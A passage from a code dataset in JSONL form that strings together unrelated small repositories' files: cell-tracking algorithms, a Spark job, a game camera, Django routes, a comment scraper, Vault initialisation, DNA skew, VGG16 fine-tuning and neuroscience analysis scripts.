np.linalg.norm(poscell1 - poscell2)\n\n # check if cell cell centers are separated by more than z_th slices\n zdisp = np.abs(FinalCenters[t - 1][i][0] - TCenters[t][j][0])\n zdisp_units = int(np.rint(zdisp / zresolution))\n\n if zdisp_units > z_th_units:\n # if so, set the distance to a large number (e.g. 100)\n Dists[i, j] = 100.0\n\n # for each future cell, which is their closest past one\n a = np.argmin(Dists, axis=0) # max prob for each future cell to be a past cell\n\n # for each past cell, which is their closest future one\n b = np.argmin(Dists, axis=1) # max prob for each past cell to be a future one\n\n correspondance = []\n notcorrespondenta = []\n notcorrespondentb = []\n\n # for each past cell\n for i, j in enumerate(b):\n # j is the index of the closest future cell to cell i\n # check if the closes cell to j cell is i\n if i == a[j]:\n # check if their distance is below a th\n if Dists[i, j] < dist_th:\n # save correspondance and final label\n correspondance.append([i, j]) # [past, future]\n label_correspondance[t].append(\n [TLabels[t][j], FinalLabels[t - 1][i]]\n )\n FinalLabels[t].append(FinalLabels[t - 1][i])\n FinalCenters[t].append(TCenters[t][j])\n\n else:\n # if there was no correspondance, save that\n notcorrespondenta.append(i)\n\n # update max label\n labmax = np.maximum(np.max(FinalLabels[t - 1]), labmax)\n\n # for each future cell\n for j in range(len(a)):\n # check if the future cell is in the correspondance\n if j not in np.array(correspondance)[:, 1]:\n # if not, save it as a new label\n label_correspondance[t].append([TLabels[t][j], labmax + 1])\n FinalLabels[t].append(labmax + 1)\n FinalCenters[t].append(TCenters[t][j])\n labmax += 1\n notcorrespondentb.append(j)\n\n return FinalLabels, label_correspondance\n\n\ndef hungarian_tracking(\n TLabels, TCenters, TOutlines, TMasks, xyresolution, zresolution, track_args\n):\n z_th = track_args[\"z_th\"]\n z_th_units = int(np.rint(z_th / zresolution))\n\n cost_attributes = track_args[\"cost_attributes\"]\n cost_ratios = track_args[\"cost_ratios\"]\n\n cost_dict = dict(zip(cost_attributes, cost_ratios))\n\n FinalLabels = []\n label_correspondance = []\n\n FinalLabels.append(TLabels[0])\n lc = [[l, l] for l in TLabels[0]]\n label_correspondance.append(lc)\n\n labmax = 0\n for t in range(1, len(TLabels)):\n FinalLabels_t = []\n label_correspondance_t = []\n\n labs1 = TLabels[t - 1]\n labs2 = TLabels[t]\n\n pos1 = TCenters[t - 1]\n pos2 = TCenters[t]\n\n masks1 = TMasks[t - 1]\n masks2 = TMasks[t]\n\n outs1 = TOutlines[t - 1]\n 
outs2 = TOutlines[t]\n\n cost_matrix = []\n for i in range(len(labs1)):\n row = []\n for j in range(len(labs2)):\n zdisp = np.abs(pos1[i][0] - pos2[j][0])\n zdisp_units = int(np.rint(zdisp / zresolution))\n\n if zdisp_units > z_th_units:\n distance = 100.0\n else:\n distance = (\n (pos1[i][1] - pos2[j][1]) ** 2 + (pos1[i][2] - pos2[j][2]) ** 2\n ) ** 0.5\n distance *= xyresolution\n\n vol1 = len(masks1[i])\n vol2 = len(masks2[j])\n volume_diff = abs(vol1 - vol2)\n shape_diff = directed_hausdorff(outs1[i], outs2[j])[\n 0\n ] # Hausdorff distance\n cost = 0\n if \"distance\" in cost_attributes:\n cost += distance * cost_dict[\"distance\"]\n if \"volume\" in cost_attributes:\n cost += volume_diff * cost_dict[\"volume\"]\n if \"shape\" in cost_attributes:\n cost += shape_diff * cost_dict[\"shape\"]\n row.append(cost)\n\n cost_matrix.append(row)\n\n # Create an instance of the Munkres class\n m = Munkres()\n\n # Solve the assignment problem using the Hungarian algorithm\n try:\n indexes = m.compute(cost_matrix)\n except IndexError:\n indexes = []\n\n # Print the matched cell pairs\n for row, column in indexes:\n label1 = labs1[row]\n # get the updated corresponding label\n label1idx = np.where(np.array(label_correspondance[t - 1])[:, 0] == label1)[\n 0\n ][0]\n\n label1 = np.array(label_correspondance[t - 1])[:, 1][label1idx]\n\n label2 = labs2[column]\n label_correspondance_t.append([label2, label1])\n FinalLabels_t.append(label1)\n\n if len(FinalLabels[t - 1]) != 0:\n labmax = np.maximum(np.max(FinalLabels[t - 1]), labmax)\n for lab in labs2:\n if lab not in np.array(label_correspondance_t)[:, 0]:\n labmax += 1\n label_correspondance_t.append([lab, labmax])\n FinalLabels_t.append(labmax)\n FinalLabels.append(FinalLabels_t)\n label_correspondance.append(label_correspondance_t)\n\n return FinalLabels, label_correspondance\n\n\n\"\"\"\nchecks necessary arguments.\n\"\"\"\n\n\ndef check_tracking_args(tracking_arguments, available_tracking=[\"greedy\", \"hungarian\"]):\n if \"method\" not in tracking_arguments.keys():\n printfancy(\"No tracking method provided. 
Using greedy algorithm\")\n printfancy()\n tracking_arguments[\"method\"] = \"greedy\"\n\n if \"time_step\" not in tracking_arguments.keys():\n printfancy(\"No time step provided, using 1 minute.\")\n printfancy()\n tracking_arguments[\"time_step\"] = 1\n\n if tracking_arguments[\"method\"] not in available_tracking:\n raise Exception(\"invalid segmentation method\")\n return\n\n\n\"\"\"\nfills rest of arguments\n\"\"\"\n\n\ndef fill_tracking_args(tracking_arguments):\n tracking_method = tracking_arguments[\"method\"]\n\n if tracking_method == \"hungarian\":\n new_tracking_arguments = {\n \"time_step\": 1,\n \"method\": \"hungarian\",\n \"z_th\": 2,\n \"cost_attributes\": [\"distance\", \"volume\", \"shape\"],\n \"cost_ratios\": [0.6, 0.2, 0.2],\n }\n\n elif tracking_method == \"greedy\":\n new_tracking_arguments = {\n \"time_step\": 1,\n \"method\": \"greedy\",\n \"dist_th\": 7.5,\n \"z_th\": 2,\n }\n\n for targ in tracking_arguments.keys():\n try:\n new_tracking_arguments[targ] = tracking_arguments[targ]\n except KeyError:\n raise Exception(\n \"key %s is not a correct argument for the selected tracking method\"\n % targ\n )\n\n return new_tracking_arguments\n","repo_name":"dsb-lab/embdevtools","sub_path":"src/embdevtools/celltrack/core/tracking/tracking.py","file_name":"tracking.py","file_ext":"py","file_size_in_byte":8861,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39603902982","text":"from pyspark import SparkContext\r\n\r\ndef main():\r\n sc = SparkContext(appName='SparkVisibility')\r\n\r\n input_file = sc.textFile('/user/hadoop/input_project_q2/*-99999-*')\r\n station_vdist = input_file.filter(lambda line: line[78:84] != '999999' and line[84:85] in ['0','1','4','5','9']) \\\r\n .map(lambda line: (line[4:10], (int(line[78:84]), 1))) \\\r\n .reduceByKey(lambda a, b: (a[0]+b[0], a[1]+b[1])) \\\r\n .map(lambda x: (x[0], x[1][0]/x[1][1]))\r\n station_vdist.saveAsTextFile('/user/hadoop/outputdata/output_project_q2.txt')\r\n\r\n sc.stop()\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"madhu-0912/My_workspace","sub_path":"Projects/Big_data/Spark_Q2/Spark_q2.py","file_name":"Spark_q2.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8016125960","text":"from constants import *\n\n\nclass Camera:\n # зададим начальный сдвиг камеры\n def __init__(self, t, level_width, level_height):\n self.level_height = level_height\n self.level_width = level_width\n self.dx = 0\n self.dy = 0\n self.t = t\n\n # сдвинуть объект obj на смещение камеры\n def apply(self, obj):\n\n obj.rect.x += self.dx\n obj.rect.y += self.dy\n\n # позиционировать камеру на объекте target\n def update(self, target):\n self.dx = -(target.rect.x + target.rect.w // 2 - WIDTH // 2)\n self.dy = -(target.rect.y + target.rect.h // 2 - HEIGHT // 2)\n if self.t.rect.x + self.dx > 0:\n self.dx = -1 * self.t.rect.x\n elif abs(self.t.rect.x + self.dx) + WIDTH > self.level_width:\n self.dx = abs(self.t.rect.x) + WIDTH - self.level_width\n if abs(self.t.rect.y + self.dy) + HEIGHT > self.level_height - 1:\n self.dy = abs(self.t.rect.y) + HEIGHT - self.level_height\n elif self.t.rect.y + self.dy > 0:\n self.dy = -self.t.rect.y\n","repo_name":"VinGP/pygameProject","sub_path":"camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 
+{"seq_id":"24343904137","text":"from django.urls import path\nfrom . import views as service_views\nfrom django.contrib.auth import views as auth_views\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n path('all-services/', service_views.view_all_services, name='services-all'),\n path('services/<str:type>', service_views.view_services, name='services'),\n path('single-service/<int:service_id>', service_views.view_single_service, name='services-single'),\n path('ajax/load-timeslots/<int:service_id>', service_views.load_timeslots, name='ajax_load_time'),\n path('booking_confirmation/<int:service_id>/<int:booking_id>', service_views.booking_confirmation, name='services-booking-confirmation'),\n path('sitter_confirmation/<int:service_id>/<int:booking_id>/<int:sitter_answer>', service_views.sitter_confirmation, name='services-sitter-confirmation'),\n path('owner_payment/<int:booking_id>', service_views.owner_payment, name='services-owner-payment'),\n path('view_miisitter_profile/<int:sitter_id>/', service_views.view_sitter_profile, name='services-view-miisitter'),\n path('view_miiowner_profile/<int:owner_id>/', service_views.view_owner_profile, name='services-view-miiowner'),\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT)\n","repo_name":"MiiPets/webapp","sub_path":"MiipetsWebApp/services/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31119715552","text":"from rest_framework.request import Request\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom apps.taskapp.celery import celery_app\n\n\nclass TaskViewApi(APIView):\n def get(self, request: Request, task_id):\n task = celery_app.AsyncResult(task_id)\n response_data = {\n 'task_id': task.id,\n 'task_status': task.status\n }\n\n if task.status == 'SUCCESS':\n response_data['result'] = 'Your pizza is ready'\n\n return Response(data=response_data)\n","repo_name":"Jiklopo/biometric-task","sub_path":"apps/taskapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7981484242","text":"# coding=utf-8\n\n##############################################################################################\n# @file:zonghengBookComments.py\n# @author:QW_Liang\n# @date:2017/9/16\n# @version:Ver0.0.0.100\n# @note:纵横图书获取评论的文件\n###############################################################################################\nimport time\nimport math\nfrom storage.cmtstorage import CMTStorage\nfrom storage.newsstorage import NewsStorage\nfrom utility.xpathutil import XPathUtility\nfrom website.common.comments import SiteComments\nfrom log.spiderlog import Logger\nfrom utility.gettimeutil import getuniformtime\nfrom utility.timeutility import TimeUtility\n\n##############################################################################################\n# @class:PubComments\n# @author:QW_Liang\n# @date:2017/9/16\n# @note:纵横图书获取评论的类,继承于SiteComments类\n##############################################################################################\nclass PubComments(SiteComments):\n # 分支条件\n STEP_2 = '2_pub'\n STEP_3 = '3_pub'\n PAGE_SIZE = 30.0\n # COMMENTS_URL = 'http://pub.zongheng.com/ajax/book.comment.getThreadL1st.do?bookId={bookId}&pageNum={pageno}'\n 
COMMENTS_URL = 'http://pub.zongheng.com/ajax/book.comment.getThreadL1st.do'\n    ##############################################################################################\n    # @functions: __init__\n    # @return: none\n    # @author: Ninghz\n    # @date: 2016/12/06\n    # @note: constructor of PubComments, initializes the internal variables\n    ##############################################################################################\n    def __init__(self, parent):\n        SiteComments.__init__(self)\n        self.website = parent.website\n\n    ##############################################################################################\n    # @functions: getcomments_step1\n    # @param: parameters passed in by the common module (target url, original url, current step, custom parameters)\n    # @return: none\n    # @author: Ninghz\n    # @date: 2016/12/06\n    # @note: build the url for fetching the number of comment pages from the input url\n    ##############################################################################################\n    def getcomments_step1(self, params):\n        bookId = int(self.r.parse('^http://pub\\.zongheng\\.com/book/(\\d+).html$', params.url)[0])\n        Logger.getlogging().debug(bookId)\n        # commentinfo_url = PubComments.COMMENTS_URL.format(bookId=bookId, pageno=1)\n        commentinfo_url = PubComments.COMMENTS_URL\n        self.storeposturl(commentinfo_url, params.originalurl, PubComments.STEP_2,{'bookId': bookId,'pageNum':'1'},{'bookId': bookId})\n\n    ##############################################################################################\n    # @functions: getcomments_step2\n    # @param: parameters passed in by the common module (target url, original url, current step, custom parameters)\n    # @return: none\n    # @author: Ninghz\n    # @date: 2016/12/6\n    # @note: build the urls for fetching all the comments from the input html\n    ##############################################################################################\n    def getcomments_step2(self, params):\n        bookId = params.customized['bookId']\n        xhtml = XPathUtility(html=params.content)\n        page_counts = int(xhtml.xpath('//div[@class=\"page\"]/@pagenum')[0])\n        comments_count = int(xhtml.xpath('//div[@class=\"page\"]/@total')[0])\n        Logger.getlogging().debug(comments_count)\n        if page_counts == 0:\n            return\n        # incremental check: skip if there are no new comments since the last crawl\n        cmtnum = CMTStorage.getcount(params.originalurl, True)\n        if cmtnum >= comments_count:\n            return\n\n        page_num = int(math.ceil(float(comments_count - cmtnum)/self.PAGE_SIZE))\n        if page_num >= self.maxpages:\n            page_num = self.maxpages\n        NewsStorage.setcmtnum(params.originalurl, comments_count)\n\n        for page in range(1, page_num+1, 1):\n            comment_url = PubComments.COMMENTS_URL\n            self.storeposturl(comment_url, params.originalurl, PubComments.STEP_3,{'bookId': bookId,'pageNum':page})\n\n    ##############################################################################################\n    # @functions: getcomments_step3\n    # @param: parameters passed in by the common module (target url, original url, current step, custom parameters)\n    # @return: none\n    # @author: QW_Liang\n    # @date: 2017/9/16\n    # @note: extract the comments from the input html\n    ##############################################################################################\n    def getcomments_step3(self, params):\n        xhtml = XPathUtility(html=params.content)\n        contents = xhtml.getlist('//*[@class=\"wz\"]/p')\n        curtimes = xhtml.getlist('//*[@class=\"fr\"]')\n        nicks = xhtml.getlist('//*[@class=\"wzbox\"]/h5')\n\n        for index in range(0, len(contents), 1):\n            curtime = curtimes[index][4:]+':00'\n            Logger.getlogging().debug(contents[index])\n            content = str(contents[index])\n            nick = str(nicks[index])\n            if not CMTStorage.exist(params.originalurl, content, curtime, nick):\n                CMTStorage.storecmt(params.originalurl, content, curtime, 
nick)","repo_name":"ErBingBing/django-tonado-crawler","sub_path":"ZG-PhaseFour/code/website/zongheng/zonghengPubComments.py","file_name":"zonghengPubComments.py","file_ext":"py","file_size_in_byte":5231,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31099634700","text":"# -*- coding: utf-8 -*-\n\n# A stripe follows the red vertex through the dotted red edges,\n# each red vertex has a triangle. Two adjacent triangles\n# (sharing two black vertex) are related by the red edge.\n# This forms a dual-graph.\n# We know the number of red vertices (it's the same as num of\n# triangles) and the triangles black vertices. We must check\n# if two of the black vertices are in the dual-graph,\n# if they are, then add an edge between that triangle/red-vertex\n# and the new triangle/red-vertex, we add 3 edges at most (since\n# there are at most 3 adjacent triangles)\n\n# We must avoid checking each red vertex each time\n# we add a new triangle, otherwise the time is quadratic\n# in the number of triangles/red-vertices\n\n\nfrom collections import defaultdict\n\n\n# runtime O(n) in the number of triangles/red-vertices\n\n\nclass RedVertex:\n def __init__(self, label, triangle):\n self.label = label\n self.triangle = triangle\n\n def __repr__(self):\n return 'RedVertex<label(%r); triangle(%r)>' % (self.label, self.triangle)\n\n\nclass Graph:\n def __init__(self):\n self.vertices = []\n self.edges = defaultdict(lambda: [])\n self.triangles = {}\n self.fragments = {} # extra O(3m) (num of triangles) space\n\n def _create_red_vertex(self, triangle):\n v = RedVertex(\n label=len(self.vertices) + 1,\n triangle=triangle)\n self.vertices.append(v)\n return v.label\n\n def insert_edge(self, x, y, directed=False):\n self.edges[x].append(y)\n if not directed:\n self.insert_edge(y, x, directed=True)\n\n # self.fragments[pair] at any given time\n # may have nothing, a triangle/red-vertex, or\n # the next triangle/red-vertex in the strip\n def insert(self, triangle):\n v = self._create_red_vertex(triangle)\n a, b, c = sorted(triangle) # O(3log3) is a constant\n # Make sure *each* pair is in asc order \"a < b < c\"\n for pair in ((a, b), (b, c), (a, c)):\n if pair in self.fragments:\n assert len(self.edges[v]) < 3, (\n 'Triangle connections maxed-out (max is 3)')\n assert v != self.fragments[pair], (\n 'Duplicated or overlapped triangle')\n self.insert_edge(v, self.fragments[pair])\n else:\n self.fragments[pair] = v\n\n\ntriangles = [\n (0, 1, 3), # next to prev and next\n (1, 2, 3), # next to prev and next\n (2, 3, 4), # next to prev and next\n (3, 4, 5), # next to prev\n\n (0, 3, 6), # next to 0\n (0, 1, 7) # next to 0\n]\n\ng = Graph()\nfor triangle in triangles:\n g.insert(triangle)\n\nprint(dict(g.edges))\n# {0: [1, 4, 5], 1: [0, 2], 2: [1, 3], 3: [2], 4: [0], 5: [0]}\nprint(len(g.vertices))\n\nassert len(g.edges) == len(triangles)\n","repo_name":"nitely/algo-design-manual-notes","sub_path":"solutions/05_11_stripe_of_triangles.py","file_name":"05_11_stripe_of_triangles.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19066530334","text":"import logging\nimport os\n\nfrom alembic import command\nfrom alembic.config import Config\n\nlogger = logging.getLogger(__name__)\n\n\ndef run_db_migrations(config, dsn: str, script_location: str) -> None:\n logger.info(f'Running DB migrations in {script_location}')\n original_wd = os.getcwd()\n 
os.chdir(script_location)\n    alembic_cfg = Config(config)\n    alembic_cfg.attributes['configure_logger'] = False\n    alembic_cfg.set_main_option('sqlalchemy.url', dsn)\n    command.upgrade(alembic_cfg, 'head')\n    os.chdir(original_wd)\n","repo_name":"kamikaze/fastapi-project-template","sub_path":"src/fastapi_project_template/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"14194429298","text":"def skew(String):\n\tmatrix = {}\n\tskew = 0\n\tindex = 0\n\tmatrix[index] = skew\n\tfor base in String:\n\t\tindex = index + 1\n\t\tif base == \"G\":\n\t\t\tskew = skew + 1\n\t\telif base == \"C\":\n\t\t\tskew = skew - 1\n\t\tmatrix[index] = skew\n\treturn matrix\n\ndef minimum(matrix):\n\tminimum_value = min(matrix.values())\n\tpotential_ori = []\n\tfor index,value in matrix.items():\n\t\tif value == minimum_value:\n\t\t\tpotential_ori.append(index)\n\treturn potential_ori\n\n\ndef maximum(matrix):\n\tmaximum_value = max(matrix.values())\n\tpotential_ori = []\n\tfor index,value in matrix.items():\n\t\tif value == maximum_value:\n\t\t\tpotential_ori.append(index)\n\treturn potential_ori\n\n\nwith open(\"dataset_7_10.txt\",\"r\") as file:\n\tString = file.read().strip()  # strip the trailing newline so it is not counted as a base\n\ncompute = skew(String)\n\n\npotential_ori = maximum(compute)\n\n\nprint(*potential_ori, sep=\" \")\n","repo_name":"neuwirtt/Bioinformatics_I","sub_path":"skew.py","file_name":"skew.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25015591","text":"#!/usr/local/bin/python3\nimport requests\n\n\ndef vaultinit():\n    url = 'http://127.0.0.1:8200/v1'\n    payload = {'secret_shares': 1, 'secret_threshold': 1}\n    initstat = requests.get('{}/sys/init'.format(url))\n    # Is Vault already initialized?\n    if initstat.json()['initialized'] == True:\n        return \"Already initialized\"\n    initreq = requests.put('{}/sys/init'.format(url), json=payload)\n    unsealreq = requests.put('{}/sys/unseal'.format(url), json={'key': initreq.json()['keys_base64'][0]})\n    default_token = requests.post('{}/auth/token/create'.format(url), headers={\"X-Vault-Token\": initreq.json()['root_token']}, json={\"no_default_policy\": \"true\"})\n    # Write client token to a file so it can be accessed elsewhere\n    with open(\"supersecrets\", \"w\") as out:\n        out.write(default_token.json()['auth']['client_token'])\n\n\nif __name__ == '__main__':\n    vaultinit()\n","repo_name":"schristoff/pyvault","sub_path":"vaultinit.py","file_name":"vaultinit.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28905845513","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 22 00:03:15 2020\n\n@author: wyckliffe\n\"\"\"\n\n\nimport numpy as np\nimport pandas as pd\nimport os\n\nfrom glob import glob\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nfrom skimage import io\n\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.layers import GlobalAveragePooling2D, Dense, Dropout, Flatten, Conv2D, MaxPooling2D\nfrom keras.models import Sequential, Model\nfrom keras.applications.vgg16 import VGG16\nfrom keras.optimizers import Adam\nfrom keras.callbacks import ModelCheckpoint, LearningRateScheduler, EarlyStopping, ReduceLROnPlateau\n\nclass Tune:\n\n    def 
__init__(self):\n\n        train_df = pd.read_csv('train.csv')\n        valid_df = pd.read_csv('test.csv')\n\n        image_size = (224, 224)\n\n        train_idg = ImageDataGenerator(rescale=1. / 255.0,\n                              horizontal_flip = True,\n                              vertical_flip = False,\n                              height_shift_range= 0.1,\n                              width_shift_range=0.1,\n                              rotation_range=20,\n                              shear_range = 0.1,\n                              zoom_range=0.1)\n\n        self.train_gen = train_idg.flow_from_dataframe(dataframe=train_df,\n                                         directory=None,\n                                         x_col = 'img_path',\n                                         y_col = 'class',\n                                         class_mode = 'binary',\n                                         target_size = image_size,\n                                         batch_size = 9\n                                         )\n\n        val_idg = ImageDataGenerator(rescale=1. / 255.0)\n\n        val_gen = val_idg.flow_from_dataframe(dataframe=valid_df,\n                                             directory=None,\n                                             x_col = 'img_path',\n                                             y_col = 'class',\n                                             class_mode = 'binary',\n                                             target_size = image_size,\n                                             batch_size = 6)\n        self.testX, self.testY = val_gen.next()\n\n\n    def model(self):\n        model = VGG16(include_top=True, weights='imagenet')\n        model.summary()\n\n        transfer_layer = model.get_layer('block5_pool')\n        vgg_model = Model(inputs=model.input, outputs=transfer_layer.output)\n\n        # choose layers to fine-tune:\n        # freeze all but the last convolutional layer\n\n        for layer in vgg_model.layers[0:17]:\n            layer.trainable = False\n\n        for layer in vgg_model.layers:\n            print(layer.name, layer.trainable)\n\n\n        new_model = Sequential()\n\n        # add the convolutional part of the VGG16 model\n        new_model.add(vgg_model)\n\n        # flatten the outputs\n        new_model.add(Flatten())\n\n        # add a dropout layer\n        new_model.add(Dropout(0.5))\n\n        # add a dense layer\n        new_model.add(Dense(1024, activation='relu'))\n\n        # add a dropout layer\n        new_model.add(Dropout(0.5))\n\n        # add another layer\n        new_model.add(Dense(512, activation='relu'))\n\n        # add a dropout layer\n        new_model.add(Dropout(0.5))\n\n        new_model.add(Dense(256, activation='relu'))\n\n        # add output layer\n        new_model.add(Dense(1, activation='sigmoid'))\n\n        # set optimizer, loss function and learning rate\n        optimizer = Adam(lr=10e-4)\n        loss = 'binary_crossentropy'\n        metrics = ['binary_accuracy']\n\n        new_model.compile(optimizer=optimizer, loss=loss, metrics=metrics)\n\n        # train for 10 epochs\n        hist = new_model.fit(self.train_gen, validation_data=(self.testX, self.testY), epochs=10)\n\n        return hist\n\ndef plot_history(history):\n    N = len(history.history[\"loss\"])\n    plt.style.use(\"ggplot\")\n    plt.figure()\n    plt.plot(np.arange(0, N), history.history[\"loss\"], label=\"train_loss\")\n    plt.plot(np.arange(0, N), history.history[\"val_loss\"], label=\"val_loss\")\n    plt.plot(np.arange(0, N), history.history[\"binary_accuracy\"], label=\"train_acc\")\n    plt.plot(np.arange(0, N), history.history[\"val_binary_accuracy\"], label=\"val_acc\")\n    plt.title(\"Training Loss and Accuracy on Dataset\")\n    plt.xlabel(\"Epoch #\")\n    plt.ylabel(\"Loss/Accuracy\")\n    plt.legend(loc=\"lower left\")\n\n\nif __name__ == '__main__':\n    t = Tune()\n    plot_history(t.model())","repo_name":"WyckliffeAluga/potential-happiness","sub_path":"ai-healthcare/pneumonia-detection/modelling/tune/fine_tuning.py","file_name":"fine_tuning.py","file_ext":"py","file_size_in_byte":4465,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20504437616","text":"import datetime\nimport struct\nimport numpy as np\nfrom tinydb import TinyDB, Query, where\nfrom tinydb.table import Document\n\n\nclass ProcessedState:\n    def __init__(self, **kwargs):\n\n        # Db Path\n        self.dbPath = 'db/statedb.json'\n\n        self.statesList = []\n\n        if kwargs.get('processed_data'):\n            self.addProcessedData(kwargs['processed_data'])\n        if 
kwargs.get('query'):\n            self.getDataFromDb(kwargs['query'])\n\n    def addProcessedData(self, processed_data):\n        # Getting processed parameters\n        prev_state = processed_data[0]\n        prev_image = processed_data[2]\n        curr_state = processed_data[1]\n        curr_image = processed_data[3]\n\n        # Creating dictionary for previous states\n        prev_state_dict = {\n            'light_sensor': int.from_bytes(prev_state[0:4], byteorder='little', signed=False),\n            'ultra_sound_left': int.from_bytes(prev_state[4:8], byteorder='little', signed=False),\n            'ultra_sound_right': int.from_bytes(prev_state[8:12], byteorder='little', signed=False),\n            'laser': int.from_bytes(prev_state[12:16], byteorder='little', signed=False),\n            # struct.unpack returns a 1-tuple, so take the scalar with [0]\n            'left_motor': struct.unpack('f', prev_state[16:20])[0],\n            'right_motor': struct.unpack('f', prev_state[20:24])[0],\n            'reward': struct.unpack('f', prev_state[24:28])[0],\n            'image': np.array(prev_image)\n        }\n\n        # Creating dictionary for current states\n        curr_state_dict = {\n            'light_sensor': int.from_bytes(curr_state[0:4], byteorder='little', signed=False),\n            'ultra_sound_left': int.from_bytes(curr_state[4:8], byteorder='little', signed=False),\n            'ultra_sound_right': int.from_bytes(curr_state[8:12], byteorder='little', signed=False),\n            'laser': int.from_bytes(curr_state[12:16], byteorder='little', signed=False),\n            'left_motor': None,\n            'right_motor': None,\n            'reward': None,\n            'image': np.array(curr_image)\n        }\n\n        self.statesList.append({'prev_state': prev_state_dict, 'curr_state': curr_state_dict})\n        return prev_state_dict, curr_state_dict\n\n    # Search the db with TinyDB queries.\n    # Documentation: https://tinydb.readthedocs.io/en/latest/usage.html#handling-data\n    # Pass the query as a string (it is evaluated with eval), not a Query instance.\n    def getDataFromDb(self, query):\n        db = TinyDB(self.dbPath)\n        query_list = db.search(eval(query))\n\n        # Correcting format of images\n        for states in query_list:\n            states['prev_state']['image'] = np.array(states['prev_state']['image'])\n            states['curr_state']['image'] = np.array(states['curr_state']['image'])\n\n        self.statesList = self.statesList + query_list\n\n    # Saves all states in statesList, updating them if they already exist.\n    def saveActualStates(self):\n        db = TinyDB(self.dbPath)\n        for states in self.statesList:\n\n            # Changing np.arrays to lists, so we can serialize them\n            states['prev_state']['image'] = states['prev_state']['image'].tolist()\n            states['curr_state']['image'] = states['curr_state']['image'].tolist()\n\n            date = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n            try:\n                states['update_date'] = date\n                db.update(Document(states, doc_id=states.doc_id))\n            except AttributeError:\n                states['create_date'] = date\n                db.insert(states)","repo_name":"istvanaut/TK-MachineLearning","sub_path":"AGVCar/PythonServer/ProcessedState.py","file_name":"ProcessedState.py","file_ext":"py","file_size_in_byte":3477,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38273431615","text":"'''\nEstimate modulation after randomizing trials.\n'''\n\n\nimport sys\nimport os\nimport numpy as np\n#from scipy import stats\n#from scipy import signal\nfrom jaratoolbox import settings\nfrom jaratoolbox import celldatabase\nreload(celldatabase)\nfrom jaratoolbox import ephyscore\n#reload(ephyscore)\n#from jaratoolbox import spikesanalysis\n#from jaratoolbox import extraplots\nimport figparams\n#from matplotlib import pyplot as plt\n\n\nevlockDataPath = '/var/tmp/processed_data/'\n#evlockDataPath = os.path.join(settings.EPHYS_PATH, figparams.STUDY_NAME, 
'evlock_spktimes')\n\ndatabaseFullPath = os.path.join(settings.DATABASE_PATH, figparams.STUDY_NAME, 'rc_database.h5')\n#celldb = celldatabase.load_hdf(databaseFullPath)\ncelldb = celldatabase.load_hdf_subset(databaseFullPath,ignore=['behavSuffix','ephysTime','paradigm','sessionType'])\n\nsys.exit()\n\n\nbrainAreas = ['rightAC','rightAStr']\n\nfor brainArea in brainAreas:\n    goodQualCells = celldb.query(\"keepAfterDupTest==1 and cellInTargetArea==1 and brainArea=='{}'\".format(brainArea))\n    cellsToProcess = goodQualCells\n\n    for indc,cellrow in cellsToProcess.iterrows():\n\n        # -- Load behavior data --\n        cellObj = ephyscore.Cell(cellrow)\n        print('{}: {}'.format(indc,cellObj))\n        sessionInds = cellObj.get_session_inds('behavior')\n        assert len(sessionInds)==1 # There should only be one behavior session\n        bdata = cellObj.load_behavior_by_index(sessionInds[0])\n        \n        # -- Load (preprocessed) ephys data --\n        alignment = 'center-out'\n        #evlockDataFilename = 'eventlocked_{0}_{1}_{2}_T{3}_c{4}_{5}.npz'.format(cellrow.subject, cellrow.date, cellrow.depth,\n        #                                                                       cellrow.tetrode, cellrow.cluster, alignment)\n        evlockDataFilename = 'eventlocked_{}_{}_T{}c{}_{}.npz'.format(cellrow.subject, cellrow.date, \n                                                                      cellrow.tetrode, cellrow.cluster, alignment)\n        evlockDataFullpath = os.path.join(evlockDataPath, evlockDataFilename)\n        try:\n            evlockSpktimes = np.load(evlockDataFullpath)\n        except IOError:\n            print('-- File not found: {}'.format(evlockDataFullpath))\n            continue\n        spikeTimesFromEventOnset = evlockSpktimes['spikeTimesFromEventOnset']\n        indexLimitsEachTrial = evlockSpktimes['indexLimitsEachTrial']\n        trialIndexForEachSpike = evlockSpktimes['trialIndexForEachSpike']\n        timeRange = evlockSpktimes['timeRange']\n        missingTrials = 